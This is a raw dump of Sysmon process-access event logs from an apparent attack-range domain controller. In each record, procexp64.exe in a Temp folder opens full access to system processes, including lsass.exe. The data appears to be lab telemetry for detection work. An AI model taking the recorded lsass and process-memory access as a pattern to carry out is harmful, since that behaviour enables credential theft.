15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152F-600B-5900-00000000A301}3940C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792439Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152E-600B-5500-00000000A301}3732C:\Program Files\Amazon\SSM\ssm-agent-worker.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792438Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3500-00000000A301}3300C:\Windows\System32\vds.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792437Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3300-00000000A301}3092C:\Windows\system32\wbem\unsecapp.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792436Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3200-00000000A301}2008C:\Windows\system32\dfssvc.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792435Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3100-00000000A301}2448C:\Windows\sysmon64.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792434Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-3000-00000000A301}2232C:\Windows\System32\ismserv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792433Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2F00-00000000A301}2884C:\Windows\system32\dns.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792432Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2E00-00000000A301}2440C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792431Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2C00-00000000A301}2760C:\Windows\system32\DFSRs.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792430Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2B00-00000000A301}2704C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792429Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2A00-00000000A301}2740C:\Program Files\Amazon\XenTools\LiteAgent.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792428Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2900-00000000A301}2724C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792427Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-152A-600B-2800-00000000A301}1980C:\Windows\System32\spoolsv.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792426Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1523-600B-2600-00000000A301}3012C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792425Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2400-00000000A301}2896C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792424Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151F-600B-2300-00000000A301}2888C:\Users\Public\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792423Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151B-600B-2100-00000000A301}2328C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792422Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1700-00000000A301}1636C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792421Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1600-00000000A301}1528C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792420Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1500-00000000A301}1480C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792419Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1400-00000000A301}1276C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792418Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1300-00000000A301}1200C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792417Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1200-00000000A301}1192C:\Windows\system32\dwm.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792416Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1100-00000000A301}1160C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792415Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-1000-00000000A301}1152C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792414Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0F00-00000000A301}1120C:\Windows\System32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792413Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0E00-00000000A301}1076C:\Windows\system32\LogonUI.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792412Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0D00-00000000A301}624C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792411Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-151A-600B-0C00-00000000A301}584C:\Windows\system32\svchost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792410Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0B00-00000000A301}856C:\Windows\system32\lsass.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792409Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0A00-00000000A301}848C:\Windows\system32\services.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792408Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0900-00000000A301}796C:\Windows\system32\winlogon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a07aa|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792407Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0800-00000000A301}720C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792406Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1518-600B-0700-00000000A301}712C:\Windows\system32\wininit.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792405Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1517-600B-0500-00000000A301}640C:\Windows\system32\csrss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792404Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0200-00000000A301}448C:\Windows\System32\smss.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792403Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 15:17:02.860{732C744F-2A79-6010-97A1-00000000A301}70407836C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe{732C744F-1514-600B-0100-00000000A301}4System0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a56b4|C:\Windows\System32\KERNELBASE.dll+25803|C:\Windows\System32\KERNEL32.DLL+169c0|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+a0806|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+7c258|C:\Users\ADMINI~1\AppData\Local\Temp\2\procexp64.exe+bcf89|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000792532Microsoft-Windows-Sysmon/Operationalwin-dc-770.attackrange.local-2021-01-26 